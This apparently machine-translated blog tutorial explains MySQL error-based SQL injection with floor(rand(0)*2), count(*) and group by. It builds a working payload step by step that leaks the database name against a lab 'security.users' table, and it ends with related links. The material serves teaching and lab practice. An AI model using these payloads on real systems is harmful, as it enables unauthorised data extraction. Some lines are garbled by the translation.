Is an error that occurs when these three functions are used together in a particular situation.
First look at the classic FLOOR injection statement:
and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
At first glance, it may seem overwhelming, but let’s start with the basics and analyze the statement at the end
The first is the condition under which the floor() error is generated:
Select count(*),floor(rand(0)*2)x from secure.users group by x select count(*),floor(rand(0)*2)x from secure.users group by x
Floor (RAND (0)*2)x = floor(RAND (0)*2)x = floor(RAND (0)*2)x = floor(RAND (0)*2
Let group by meet floor(rand(0)*2) (if you’ll excuse me),
The specific principle will not be analyzed here, and a few principle explanation links will be attached at the end.
First look at the direct execution effect:
The Duplocate Entry error here is exactly what we want. The error location is on the floor(RAND (0)*2), and the 1 is determined by the error principle. After all, we haven’t written any of the subqueries we want.
Next we add the desired subquery to the error location, concatenating it with concat() :
select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x
Security is the database name we want, 1 is the concatenation from the previous step.
But is it possible to use it directly now?Let’s see what happens when we concatenate it directly into and:
select * from security.users where id=1 and (select count(*) ,concat(database(),floor(rand(0)*2)x) from security.users group by x)
To a fault, baidu found a cause for this error a lot, I am here think we build the result of a select statement is a result table, while the and need a Boolean value, that is, the value of the zero or non-zero, that we are in a nested query, said the result is a result of the select in front of the table, that we can again from this table to execute queries, but this time the select this value is zero number:
select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a
Again, this last “a” does exactly the same thing as the “x” we explained earlier, which is an alias for the parentheses,
SQL statements require that an alias name be given when a query is executed based on the result of the query.
Execute after nested into AND
select * from security.users where id=1 and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a)
You’re done
We have completed the floo() injection statement we introduced at the beginning
Several fool() principles explained:
https://www.cnblogs.com/xdans/p/5412468.html
https://www.cnblogs.com/litlife/p/8472323.html
http://www.cnblogs.com/xishaonian/p/6227405.html
Referral to indicate source
Sync to my blog: http://119.23.249.120/archives/276
Read More:
- Ctfhub error injection
- The usage of several integer functions in MATLAB (fix, floor, ceil, round)
- The difference of four kinds of integer function (fix floor ceil round) in MATLAB
- 12-web security — error injection based on SQL Server — and, convert, cast
- C / C + + rounding function ceil(), floor ()
- SQL injection for ASP + access website
- Datasource bean injection failed, with startup error
- Error creating bean with name ‘helloController‘: Injection of autowired dependencies failed;
- @Autowired injection * * required a single bean, but 2 were found**
- Solution of spring auto injection always report error in IntelliJ idea
- Error Code: 1055. Expression #2 of SELECT list is not in GROUP BY clause and contains nonaggregated
- SQL query time group_ Was cut by group_ CONCAT()
- Hive SQL syntax error and corresponding solutions
- WebView loadrequest request request error “nsurlconnection finished with error – Code – 1022”
- Prompt SQL server error 15023 solution memo when modifying user mapping
- Type definition error – one of the causes of type definition errors is WM in Oracle_ Concat function usage
- About MySQL error: subquery returns more than 1 row
- SQL Union, union all usage and common errors and Solutions
- How to view the version of MySQL database
- Completely solve Mechanism level: Failed to find any Kerberos tgt